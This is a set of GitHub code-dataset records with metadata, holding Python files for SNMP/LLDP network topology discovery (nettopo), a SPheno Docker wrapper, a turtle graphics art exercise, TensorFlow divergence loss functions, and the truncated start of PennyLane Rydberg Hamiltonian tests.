'1.0.8802.1.1.2.1.4.1.1.8.0'\n LLDP_DEVNAME: str = '1.0.8802.1.1.2.1.4.1.1.9.0'\n LLDP_DEVDESC: str = '1.0.8802.1.1.2.1.4.1.1.10.0'\n LLDP_DEVADDR: str = '1.0.8802.1.1.2.1.4.2.1.5.0'\n \"\"\"\n _lldp_mib = '1.0.8802.1.1.2'\n _lldp_devaddr = '1.0.8802.1.1.2.1.4.2.1.5.0'\n _lldp_devid = '1.0.8802.1.1.2.1.4.1.1.5.0'\n _lldp_devport = '1.0.8802.1.1.2.1.4.1.1.7.0'\n _lldp_devpdsc = '1.0.8802.1.1.2.1.4.1.1.8.0'\n _lldp_port_name = '1.0.8802.1.1.2.1.3.7.1.4'\n _lldp_remote_descr = '1.0.8802.1.1.2.1.4.1.1.10.0'\n _lldp_remote_name = '1.0.8802.1.1.2.1.4.1.1.9.0'\n neighbors = []\n lldp = 
self.snmp_get(_lldp_mib, is_bulk=True)\n lld_dev_names = lldp.search(_lldp_remote_name)\n for oid, name in lld_dev_names.items():\n link = LinkData()\n link.discovered_proto = 'lldp'\n link.remote_name = normalize_host(\n name,\n self.snmp.config.host_domains,\n )\n idx1 = get_oid_index(oid, -2)\n idx2 = get_oid_index(oid, -1)\n idx = \".\".join(oid.split('.')[-2:])\n lldp_port = lldp.table.get(f\"{_lldp_port_name}.{idx1}\")\n link.local_port = normalize_port(lldp_port)\n link = self.get_link(idx1, link)\n rip_oid = f\"{_lldp_devaddr}.{idx}\"\n link.remote_ip = self.get_cidr_from_oid(rip_oid)\n # Lookup MAC with IP from arp_table\n for arp in self.arp_table:\n if arp.ip == link.remote_ip:\n link.remote_mac = arp.mac\n rport = lldp.table.get(f\"{_lldp_devport}.{idx}\")\n link.remote_port = normalize_port(rport)\n link.remote_port_desc = lldp.table.get(f\"{_lldp_devpdsc}.{idx}\")\n # devid = lldp.table.get(f\"{_lldp_devid}.{idx}\")\n # link.remote_mac = mac_hex_to_ascii(devid)\n rios_bytes = lldp.table.get(f\"{_lldp_remote_descr}.{idx}\")\n link = self._link_ios(rios_bytes, link)\n neighbors.append(link)\n return neighbors\n\n\"\"\" SNMP Queries Saved\nospf = self.snmp_get(o.OSPF)\nospf_id = self.snmp_get(o.OSPF_ID)\n\nent_class = self.snmp_get(o.ENTPHYENTRY_CLASS, is_bulk=True)\nent_serial = self.snmp_get(o.ENTPHYENTRY_SERIAL, is_bulk=True)\nent_plat = self.snmp_get(o.ENTPHYENTRY_PLAT, is_bulk=True)\nent_ios = self.snmp_get(o.ENTPHYENTRY_SOFTWARE, is_bulk=True)\nlink_type = self.snmp_get(o.TRUNK_VTP, is_bulk=True)\nlag = self.snmp_get(o.LAG_LACP, is_bulk=True)\nifname = self.snmp_get(o.IFNAME, is_bulk=True)\nifip = self.snmp_get(o.IF_IP, is_bulk=True)\nethif = self.snmp_get(o.ETH_IF, is_bulk=True)\ntrunk_allowed = self.snmp_get(o.TRUNK_ALLOW, is_bulk=True)\ntrunk_native = self.snmp_get(o.TRUNK_NATIVE, is_bulk=True)\nportnums = self.snmp_get(o.BRIDGE_PORTNUMS, is_bulk=True)\nifindex = self.snmp_get(o.IFINDEX, is_bulk=True)\nvlan = self.snmp_get(o.VLANS, is_bulk=True)\nvlandesc = self.snmp_get(o.VLAN_DESC, is_bulk=True)\nsvi = self.snmp_get(o.SVI_VLANIF, is_bulk=True)\nvpc = self.snmp_get(o.VPC_PEERLINK_IF, is_bulk=True)\nstack = self.snmp_get(o.STACK, is_bulk=True)\ncdp = self.snmp_get(o.CDP, is_bulk=True)\nlldp = self.snmp_get(o.LLDP, is_bulk=True)\nroute = self.snmp_get(o.IP_ROUTE_TABLE, is_bulk=True)\narp = self.snmp_get(o.ARP, is_bulk=True)\ncam = self.snmp_get(o.VLAN_CAM, is_bulk=True)\n\nbulk_shit = {\n 'ent_class': o.ENTPHYENTRY_CLASS,\n 'ent_serial': o.ENTPHYENTRY_SERIAL,\n 'ent_plat': o.ENTPHYENTRY_PLAT,\n 'ent_ios': o.ENTPHYENTRY_SOFTWARE,\n 'link_type': o.TRUNK_VTP,\n 'lag': o.LAG_LACP,\n 'ifname': o.IFNAME,\n 'ifip': o.IF_IP,\n 'ethif': o.ETH_IF,\n 'trunk_allowed': o.TRUNK_ALLOW,\n 'trunk_native': o.TRUNK_NATIVE,\n 'portnums': o.BRIDGE_PORTNUMS,\n 'ifindex': o.IFINDEX,\n 'vlan': o.VLANS,\n 'vlandesc': o.VLAN_DESC,\n 'svi': o.SVI_VLANIF,\n 'vpc': o.VPC_PEERLINK_IF,\n 'stack': o.STACK,\n 'cdp': o.CDP,\n 'lldp': o.LLDP,\n 'route': o.IP_ROUTE_TABLE,\n 'arp': o.ARP,\n 'cam': o.VLAN_CAM,\n}\n\"\"\"\n", "repo_name": "rlaneyjr/nettopo", "sub_path": "nettopo/core/node.py", "file_name": "node.py", "file_ext": "py", "file_size_in_byte": 35606, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Union", "line_number": 72, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 74, "usage_type": "name"}, {"api_name": 
"typing.Union", "line_number": 75, "usage_type": "name"}, {"api_name": "pysnmp.smi.rfc1902.ObjectIdentity", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 76, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 76, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 77, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 78, "usage_type": "name"}, {"api_name": "nettopo.core.data.EntData", "line_number": 78, "usage_type": "name"}, {"api_name": "nettopo.oids.Oids", "line_number": 81, "usage_type": "call"}, {"api_name": "nettopo.oids.GeneralOids", "line_number": 82, "usage_type": "call"}, {"api_name": "nettopo.oids.CiscoOids", "line_number": 83, "usage_type": "call"}, {"api_name": "alive_progress.config_handler.set_global", "line_number": 85, "usage_type": "call"}, {"api_name": "alive_progress.config_handler", "line_number": 85, "usage_type": "name"}, {"api_name": "nettopo.core.data.BaseData", "line_number": 88, "usage_type": "name"}, {"api_name": "nettopo.core.snmp.SNMP", "line_number": 91, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 129, "usage_type": "name"}, {"api_name": "nettopo.core.data.LinkData", "line_number": 138, "usage_type": "name"}, {"api_name": "binascii.unhexlify", "line_number": 141, "usage_type": "call"}, {"api_name": "sysdescrparser.sysdescrparser", "line_number": 148, "usage_type": "call"}, {"api_name": "nettopo.core.util.format_ios_ver", "line_number": 155, "usage_type": "call"}, {"api_name": "nettopo.core.exceptions.NettopoSNMPError", "line_number": 164, "usage_type": "call"}, {"api_name": "alive_progress.alive_bar", "line_number": 192, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_host", "line_number": 196, "usage_type": "call"}, {"api_name": "sysdescrparser.sysdescrparser", "line_number": 205, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 297, "usage_type": "name"}, {"api_name": "nettopo.core.data.LinkData", "line_number": 297, "usage_type": "name"}, {"api_name": "nettopo.core.data.InterfaceData", "line_number": 315, "usage_type": "name"}, {"api_name": "nettopo.core.util.is_ipv4_address", "line_number": 327, "usage_type": "call"}, {"api_name": "nettopo.core.util.bits_from_mask", "line_number": 330, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_port", "line_number": 344, "usage_type": "call"}, {"api_name": "nettopo.core.util.is_ipv4_address", "line_number": 374, "usage_type": "call"}, {"api_name": "nettopo.core.util.bits_from_mask", "line_number": 378, "usage_type": "call"}, {"api_name": "nettopo.core.util.mac_hex_to_ascii", "line_number": 434, "usage_type": "call"}, {"api_name": "nettopo.core.data.InterfaceData", "line_number": 440, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_port", "line_number": 442, "usage_type": "call"}, {"api_name": "nettopo.core.constants.int_type_map.get", "line_number": 446, "usage_type": "call"}, {"api_name": "nettopo.core.constants.int_type_map", "line_number": 446, "usage_type": "name"}, {"api_name": "nettopo.core.constants.int_admin_status_map.get", "line_number": 448, "usage_type": "call"}, {"api_name": "nettopo.core.constants.int_admin_status_map", "line_number": 448, "usage_type": "name"}, {"api_name": "nettopo.core.constants.int_oper_status_map.get", "line_number": 450, "usage_type": "call"}, {"api_name": "nettopo.core.constants.int_oper_status_map", "line_number": 450, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 384, "usage_type": 
"name"}, {"api_name": "nettopo.core.data.InterfaceData", "line_number": 384, "usage_type": "name"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 475, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 484, "usage_type": "call"}, {"api_name": "nettopo.core.util.format_ios_ver", "line_number": 489, "usage_type": "call"}, {"api_name": "nettopo.core.data.EntData", "line_number": 491, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 504, "usage_type": "name"}, {"api_name": "nettopo.core.data.InterfaceData", "line_number": 504, "usage_type": "name"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 512, "usage_type": "call"}, {"api_name": "nettopo.core.data.SVIData", "line_number": 513, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 508, "usage_type": "name"}, {"api_name": "nettopo.core.data.SVIData", "line_number": 508, "usage_type": "name"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 525, "usage_type": "call"}, {"api_name": "nettopo.core.constants.RESERVED_VLANS", "line_number": 526, "usage_type": "name"}, {"api_name": "nettopo.core.data.VLANData", "line_number": 527, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 520, "usage_type": "name"}, {"api_name": "nettopo.core.data.VLANData", "line_number": 520, "usage_type": "name"}, {"api_name": "nettopo.core.data.StackData", "line_number": 532, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 536, "usage_type": "call"}, {"api_name": "nettopo.core.data.StackMemberData", "line_number": 537, "usage_type": "call"}, {"api_name": "nettopo.core.util.mac_hex_to_ascii", "line_number": 549, "usage_type": "call"}, {"api_name": "nettopo.core.data.StackData", "line_number": 530, "usage_type": "name"}, {"api_name": "nettopo.core.data.VssData", "line_number": 562, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 570, "usage_type": "call"}, {"api_name": "nettopo.core.data.VssMemberData", "line_number": 574, "usage_type": "call"}, {"api_name": "nettopo.core.data.VssData", "line_number": 556, "usage_type": "name"}, {"api_name": "nettopo.core.data.VPCData", "line_number": 591, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 592, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 584, "usage_type": "name"}, {"api_name": "nettopo.core.data.VPCData", "line_number": 584, "usage_type": "name"}, {"api_name": "nettopo.core.util.mac_hex_to_ascii", "line_number": 651, "usage_type": "call"}, {"api_name": "nettopo.core.data.ARPData", "line_number": 652, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 596, "usage_type": "name"}, {"api_name": "nettopo.core.data.ARPData", "line_number": 596, "usage_type": "name"}, {"api_name": "nettopo.core.util.mac_hex_to_ascii", "line_number": 681, "usage_type": "call"}, {"api_name": "nettopo.core.constants.bridge_status_map.get", "line_number": 684, "usage_type": "call"}, {"api_name": "nettopo.core.constants.bridge_status_map", "line_number": 684, "usage_type": "name"}, {"api_name": "nettopo.core.data.MACData", "line_number": 693, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 655, "usage_type": "name"}, {"api_name": "nettopo.core.data.MACData", "line_number": 655, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 697, "usage_type": "name"}, {"api_name": "nettopo.core.data.MACData", "line_number": 697, "usage_type": "name"}, 
{"api_name": "nettopo.core.data.LinkData", "line_number": 708, "usage_type": "name"}, {"api_name": "nettopo.core.data.LinkData", "line_number": 710, "usage_type": "call"}, {"api_name": "nettopo.core.util.parse_allowed_vlans", "line_number": 740, "usage_type": "call"}, {"api_name": "nettopo.core.data.LinkData", "line_number": 783, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_host", "line_number": 785, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 789, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 790, "usage_type": "call"}, {"api_name": "nettopo.core.util.ip_2_str", "line_number": 796, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_port", "line_number": 804, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 755, "usage_type": "name"}, {"api_name": "nettopo.core.data.LinkData", "line_number": 755, "usage_type": "name"}, {"api_name": "nettopo.core.data.LinkData", "line_number": 840, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_host", "line_number": 842, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 846, "usage_type": "call"}, {"api_name": "nettopo.core.util.get_oid_index", "line_number": 847, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_port", "line_number": 850, "usage_type": "call"}, {"api_name": "nettopo.core.util.normalize_port", "line_number": 859, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 814, "usage_type": "name"}, {"api_name": "nettopo.core.data.LinkData", "line_number": 814, "usage_type": "name"}]} +{"seq_id": "24026535308", "text": "import argparse, subprocess, traceback, sys, json, textwrap\nfrom shutil import copyfile\n\ndef main():\n args = parse_arg()\n\n slha_in = sys.stdin.readlines()\n slha_out = spheno(slha_in)\n\n print(''.join(slha_out))\n\n\ndef spheno(slha):\n workdir = '/spheno/'\n spheno = workdir + 'bin/SPheno'\n\n spheno_in = workdir + 'LesHouches.in'\n spheno_out = workdir + 'SPheno.spc'\n\n with open(spheno_in, 'w') as f:\n f.write(''.join(slha))\n\n command = [spheno, spheno_in]\n\n try:\n o = subprocess.check_output(command, stderr=subprocess.STDOUT, cwd=workdir)\n except subprocess.CalledProcessError as e:\n raise Exception('spheno: ' + str(e) + ':\\n' + e.output)\n\n with open(spheno_out, 'r') as f:\n slha_out = f.readlines()\n\n return slha_out\n\n\ndef parse_arg():\n a = argparse.ArgumentParser(prog='spheno',\n description=textwrap.dedent('''\\\n Dockerized version of SPheno SUSY spectrum calculator.\n\n Takes SLHA file as input and writes SLHA to output.\n '''),\n formatter_class=argparse.RawTextHelpFormatter)\n\n args = a.parse_args()\n return vars(args)\n\nif __name__ == '__main__':\n main()\n\n", "repo_name": "sliem/docker-hep", "sub_path": "spheno/interface.py", "file_name": "interface.py", "file_ext": "py", "file_size_in_byte": 1303, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.stdin.readlines", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 7, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 26, "usage_type": "call"}, {"api_name": "subprocess.STDOUT", "line_number": 26, "usage_type": "attribute"}, {"api_name": "subprocess.CalledProcessError", "line_number": 27, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 37, "usage_type": 
"call"}, {"api_name": "textwrap.dedent", "line_number": 38, "usage_type": "call"}, {"api_name": "argparse.RawTextHelpFormatter", "line_number": 43, "usage_type": "attribute"}]} +{"seq_id": "29426465342", "text": "###This code will not work in repl.it as there is no access to the colorgram package here.###\n##We talk about this in the video tutorials##\nimport colorgram\nfrom random import choice\nfrom turtle import Turtle, Screen\n\n# import colorgram\n#\n# # Extract 6 colors from an image.\n# colors = colorgram.extract('sweet_pic.jpg', 6)\n#\n# # colorgram.extract returns Color objects, which let you access\n# # RGB, HSL, and what proportion of the image was that color.\n# first_color = colors[0]\n# rgb = first_color.rgb # e.g. (255, 151, 210)\n# hsl = first_color.hsl # e.g. (230, 255, 203)\n# proportion = first_color.proportion # e.g. 0.34\n#\n# # RGB and HSL are named tuples, so values can be accessed as properties.\n# # These all work just as well:\n# red = rgb[0]\n# red = rgb.r\n# saturation = hsl[1]\n# saturation = hsl.s\n\nrgb_colors = []\ncolors = colorgram.extract('image.jpg', 50)\n\nfor color in colors:\n new_color = (color.rgb[0:])\n rgb_colors.append(new_color)\n\nsdet_soloman = Turtle('turtle')\nsdet_soloman.speed(4)\nsdet_soloman.penup()\nsdet_soloman.setposition(-340, -300)\nsdet_soloman.shapesize(2)\n\nscreen = Screen()\nscreen.colormode(255)\n\nfor char in range(0, 13):\n\n for num in range(0, 12):\n sdet_soloman.color(choice(rgb_colors))\n sdet_soloman.stamp()\n sdet_soloman.forward(60)\n\n sdet_soloman.setposition(-340, sdet_soloman.ycor() + 50)\n\n\n\nscreen.exitonclick()\n", "repo_name": "SDET-SOLOMAN/a_hundred_days_of_python", "sub_path": "day_16/hirst_paintin_turtle_images.py", "file_name": "hirst_paintin_turtle_images.py", "file_ext": "py", "file_size_in_byte": 1388, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "colorgram.extract", "line_number": 27, "usage_type": "call"}, {"api_name": "turtle.Turtle", "line_number": 33, "usage_type": "call"}, {"api_name": "turtle.Screen", "line_number": 39, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "26073601004", "text": "from functools import partial\nfrom core_tools import ops as K\nimport tensorflow as tf\nfrom tensorflow.keras.losses import SparseCategoricalCrossentropy, BinaryCrossentropy, binary_crossentropy, \\\n kl_divergence\n\nBinaryCrossEntropy = partial(BinaryCrossentropy, from_logits=True)\nCrossEntropy = partial(SparseCategoricalCrossentropy, from_logits=True)\nbinary_cross_entropy = partial(binary_crossentropy, from_logits=True)\n\n\ndef kl_div(y_true, y_pred, from_logits=True, sparse=True, sigmoid=\"auto\", expand_sigmoid=True):\n if sigmoid == \"auto\":\n sigmoid = True if y_pred.shape[-1] == 1 else False\n if from_logits:\n if sigmoid:\n y_pred = tf.nn.sigmoid(y_pred)\n else:\n y_pred = tf.nn.softmax(y_pred)\n if sparse == \"logits\":\n if sigmoid:\n y_true = tf.nn.sigmoid(y_true)\n else:\n y_true = tf.nn.softmax(y_true)\n elif sparse:\n # Older TensorFlow version do not support int8 in one-hot.\n y_true = tf.one_hot(K.uint(y_true), depth=y_pred.shape[-1])\n if sigmoid is True and expand_sigmoid:\n y_pred = tf.concat([1 - y_pred, y_pred], axis=-1)\n y_true = tf.concat([1 - y_true, y_true], axis=-1)\n # print(f\"kl - {y_true} {y_pred}\")\n result = kl_divergence(y_true, y_pred)\n if sigmoid is True:\n result = result[..., None]\n return result\n\n\ndef 
symmetrical_divergence(y_true, y_pred, *args, fn=kl_div, **kwargs):\n return (fn(y_true, y_pred, *args, **kwargs) + fn(y_pred, y_true, *args, **kwargs)) / 2\n\n\nsym_div = symmetrical_divergence\n\n# jensen_shannon_divergence\n# probably works only for probabilities\ndef js_div(y_true, y_pred, from_logits=True, sparse=True, sigmoid=\"auto\", expand_sigmoid=True):\n return kl_div(y_true, (y_true + y_pred) / 2, from_logits=from_logits, sparse=sparse, sigmoid=sigmoid,\n expand_sigmoid=expand_sigmoid) + \\\n kl_div(y_pred, (y_true + y_pred) / 2, from_logits=from_logits,\n sparse=sparse, sigmoid=sigmoid, expand_sigmoid=expand_sigmoid) / 2\n\n\n# jensen_shannon_divergence 2\ndef js_div_2(y_true, y_pred, from_logits=True, sparse=True, sigmoid=\"auto\", expand_sigmoid=True):\n if sigmoid == \"auto\":\n sigmoid = True if y_pred.shape[-1] == 1 else False\n if from_logits:\n if sigmoid:\n y_pred = tf.nn.sigmoid(y_pred)\n else:\n y_pred = tf.nn.softmax(y_pred)\n if sparse == \"logits\":\n if sigmoid:\n y_true = tf.nn.sigmoid(y_true)\n else:\n y_true = tf.nn.softmax(y_true)\n elif sparse:\n # Older TensorFlow version do not support int8 in one-hot.\n y_true = tf.one_hot(K.uint(y_true), depth=y_pred.shape[-1])\n if sigmoid is True and expand_sigmoid:\n y_pred = tf.concat([1 - y_pred, y_pred], axis=-1)\n y_true = tf.concat([1 - y_true, y_true], axis=-1)\n # print(f\"kl - {y_true} {y_pred}\")\n result = kl_divergence(y_true, (y_true + y_pred) / 2) + kl_divergence(y_pred, (y_true + y_pred) / 2)\n if sigmoid is True:\n result = result[..., None]\n return result\n\n\ndef cross_entropy_with_logits(y_true, y_pred, axis=-1, true_from_logits=True, sigmoid=False):\n if true_from_logits:\n if sigmoid:\n y_true = tf.nn.sigmoid(y_true)\n else:\n y_true = tf.nn.softmax(y_true, axis=axis)\n # print(f\"cross_entropy - {y_true} {y_pred}\")\n if sigmoid:\n return tf.nn.sigmoid_cross_entropy_with_logits(y_true, y_pred)\n return tf.nn.softmax_cross_entropy_with_logits(y_true, y_pred, axis=axis)\n\n\ndef debug_(fn):\n def wrapper(y_true, y_pred):\n # print(f\"{fn} - {y_true} {y_pred}\")\n result = fn(y_true, y_pred)\n return result\n\n return wrapper\n\n# y_true.numpy().sum(1)\n# tf.nn.sigmoid(y_pred).numpy().sum(1)\n# y_true\n\n\n# def sigmoid_kl_divergence(y_true, y_pred):\n# return kl_divergence(y_true, tf.nn.sigmoid(y_pred))\n\n# y_pred.numpy()\n# y_true.numpy()\n# tf.nn.softmax(y_pred).numpy()\n# y_true.numpy()\n# tf.one_hot(y_true, depth=y_pred.shape[-1]).numpy()\n# kl_divergence(y_true, y_pred).numpy()\n# tf.concat([1 - y_true, y_true], axis=-1).numpy()\n", "repo_name": "jakubkwiatkowski/core_tools", "sub_path": "core_tools/loss.py", "file_name": "loss.py", "file_ext": "py", "file_size_in_byte": 4122, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "functools.partial", "line_number": 7, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.BinaryCrossentropy", "line_number": 7, "usage_type": "argument"}, {"api_name": "functools.partial", "line_number": 8, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 8, "usage_type": "argument"}, {"api_name": "functools.partial", "line_number": 9, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.binary_crossentropy", "line_number": 9, "usage_type": "argument"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 17, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 17, "usage_type": "attribute"}, 
{"api_name": "tensorflow.nn.softmax", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tensorflow.one_hot", "line_number": 27, "usage_type": "call"}, {"api_name": "core_tools.ops.uint", "line_number": 27, "usage_type": "call"}, {"api_name": "core_tools.ops", "line_number": 27, "usage_type": "name"}, {"api_name": "tensorflow.concat", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.kl_divergence", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.one_hot", "line_number": 69, "usage_type": "call"}, {"api_name": "core_tools.ops.uint", "line_number": 69, "usage_type": "call"}, {"api_name": "core_tools.ops", "line_number": 69, "usage_type": "name"}, {"api_name": "tensorflow.concat", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.kl_divergence", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sigmoid_cross_entropy_with_logits", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 89, "usage_type": "attribute"}]} +{"seq_id": "31505356612", "text": "import numpy as np\nimport pytest\n\nimport pennylane as qml\nfrom pennylane.pulse import rydberg_interaction, rydberg_drive\nfrom pennylane.pulse.hardware_hamiltonian import (\n HardwareHamiltonian,\n HardwarePulse,\n AmplitudeAndPhase,\n)\n\nfrom pennylane.wires import Wires\nfrom pennylane.pulse.rydberg import RydbergSettings\n\natom_coordinates = [[0, 0], [0, 5], [5, 0], [10, 5], [5, 10], [10, 10]]\nwires = [1, 6, 0, 2, 4, 3]\n\n\nclass TestRydbergInteraction:\n \"\"\"Unit tests for the ``rydberg_interaction`` function.\"\"\"\n\n def test_queuing(self):\n \"\"\"Test that the function does not queue any objects.\"\"\"\n with qml.queuing.AnnotatedQueue() as q:\n rydberg_interaction(register=atom_coordinates, wires=wires, interaction_coeff=1)\n\n assert len(q) == 0\n\n def 
test_attributes_and_number_of_terms(self):\n \"\"\"Test that the attributes and the number of terms of the ``ParametrizedHamiltonian`` returned by\n ``rydberg_interaction`` are correct.\"\"\"\n Hd = rydberg_interaction(register=atom_coordinates, wires=wires, interaction_coeff=1)\n settings = RydbergSettings(atom_coordinates, 1)\n\n assert isinstance(Hd, HardwareHamiltonian)\n assert Hd.wires == Wires(wires)\n N = len(wires)\n num_combinations = N * (N - 1) / 2 # number of terms on the rydberg_interaction hamiltonian\n assert len(Hd.ops) == num_combinations\n assert Hd.pulses == []\n assert Hd.settings == settings\n\n def test_wires_is_none(self):\n \"\"\"Test that when wires is None the wires correspond to an increasing list of values with\n the same length as the atom coordinates.\"\"\"\n Hd = rydberg_interaction(register=atom_coordinates)\n\n assert Hd.wires == Wires(list(range(len(atom_coordinates))))\n\n def test_coeffs(self):\n \"\"\"Test that the generated coefficients are correct.\"\"\"\n coords = [[0, 0], [0, 1], [1, 0]]\n # factor (2 * np.pi) to convert between angular and standard frequency\n Hd = rydberg_interaction(coords, interaction_coeff=1 / (2 * np.pi))\n assert Hd.coeffs == [1, 1, 1 / np.sqrt(2) ** 6]\n\n def test_different_lengths_raises_error(self):\n \"\"\"Test that using different lengths for the wires and the register raises an error.\"\"\"\n with pytest.raises(ValueError, match=\"The length of the wires and the register must match\"):\n _ = rydberg_interaction(register=atom_coordinates, wires=[0])\n\n def test_max_distance(self):\n \"\"\"Test that specifying a maximum distance affects the number of elements in the interaction term\n as expected.\"\"\"\n # This threshold will remove interactions between atoms more than 5 micrometers away from each other\n max_distance = 5\n coords = [[0, 0], [2.5, 0], [5, 0], [6, 6]]\n h_wires = [1, 0, 2, 3]\n\n # Set interaction_coeff to one for easier comparison\n # factor (2 * np.pi) to convert between angular and standard frequency\n H_res = rydberg_interaction(\n register=coords,\n wires=h_wires,\n interaction_coeff=1 / (2 * np.pi),\n max_distance=max_distance,\n )\n H_exp = rydberg_interaction(\n register=coords[:3], wires=h_wires[:3], interaction_coeff=1 / (2 * np.pi)\n )\n\n # Only 3 of the interactions will be non-negligible\n assert H_res.coeffs == [2.5**-6, 5**-6, 2.5**-6]\n assert qml.equal(H_res([], t=5), H_exp([], t=5))\n\n\nclass TestRydbergDrive:\n \"\"\"Unit tests for the ``rydberg_drive`` function\"\"\"\n\n def test_attributes_and_number_of_terms(self):\n \"\"\"Test that the attributes and the number of terms of the ``ParametrizedHamiltonian`` returned by\n ``rydberg_drive`` are correct.\"\"\"\n\n Hd = rydberg_drive(amplitude=1, phase=2, detuning=3, wires=[1, 2])\n\n assert isinstance(Hd, HardwareHamiltonian)\n assert Hd.settings is None\n assert Hd.wires == Wires([1, 2])\n assert len(Hd.ops) == 3 # 2 amplitude/phase terms and one detuning term\n assert Hd.pulses == [HardwarePulse(1, 2, 3, [1, 2])]\n\n def test_multiple_local_drives(self):\n \"\"\"Test that adding multiple drive terms behaves as expected\"\"\"\n\n # factors (2 * np.pi) to convert between angular and standard frequency\n def fa(p, t):\n return np.sin(p * t) / (2 * np.pi)\n\n def fb(p, t):\n return np.cos(p * t)\n\n H1 = rydberg_drive(amplitude=fa, phase=1, detuning=3, wires=[0, 3])\n H2 = rydberg_drive(amplitude=1 / (2 * np.pi), phase=3, detuning=fb, wires=[1, 2])\n Hd = H1 + H2\n\n ops_expected = [\n qml.Hamiltonian(\n [-0.5 * (2 * np.pi), -0.5 * (2 
